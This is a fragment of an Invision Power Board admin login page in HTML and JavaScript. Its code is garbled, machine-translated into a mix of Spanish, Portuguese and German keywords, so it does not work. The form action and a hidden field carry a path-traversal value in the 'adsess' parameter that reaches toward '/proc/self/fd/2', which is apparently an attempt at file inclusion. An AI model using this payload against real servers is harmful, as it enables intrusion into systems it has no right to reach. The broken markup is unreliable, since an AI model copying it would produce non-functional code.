class='input_text' id='#{id}_input' size='8' /> <input type='submit' value =' Ir' class='input_submit add_folder' id='#{id} _submit' /></div>");ipb.templates['ajax_loading'] = "<div id='ajax_loading'>Carregando... < /div>";acp = nueva IPBACP;//]]></script><script type="text/javascript" src="http://www.invisionpower.com/ccs_forums_install/cache/lang_cache/1/ acp.lang.js" charset="UTF-8"></script></head><body id='ipboard_body'><div id='loading-layer' style=' display:none'><div id ='cargando-capa-sombra'> <div id='cargando-capa-interior' > <img src='http://www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/loading_anim.gif' style= 'vertikal-align:middle' /> <span style='font-weight:bold' id='loading-layer-text'>Carregando dados. Aguarde...</span> </div></div></div><script type='text/javascript'>if (arriba!= self){arriba.ubicación.href = ventana.ubicación.href; }Evento.observar( ventana, 'cargar', función(e){$('nombre de usuario').focus();});</script><form action='http://www.invisionpower.com/ ccs_forums_install /admin/index.php?adsess=../../../../../../CANTBEHERE/../../../../proc/self/fd/2&app= core&module =login&do=login-complete' method='post'><input type='hidden' name='qstring' id='qstring' value='old_adsess=../../../../. . / ../CANTBEHERE/../../../../proc/self/fd/2&' /><div id='login'><div id='login_controls'><etiqueta para=' nome de usuário '>Benutzername oder E-Mail-Ende</label><input type='text' size='20' id='username' name='username' value=''><label for='password' >Senha</label> <input type='password' size='20' id='password' name='password' value=''></div><div id='login_submit'><input type=' enviar' class='button ' value="Iniciar sesión" /></div></div></formulario></div></div></formulario></cuerpo></html>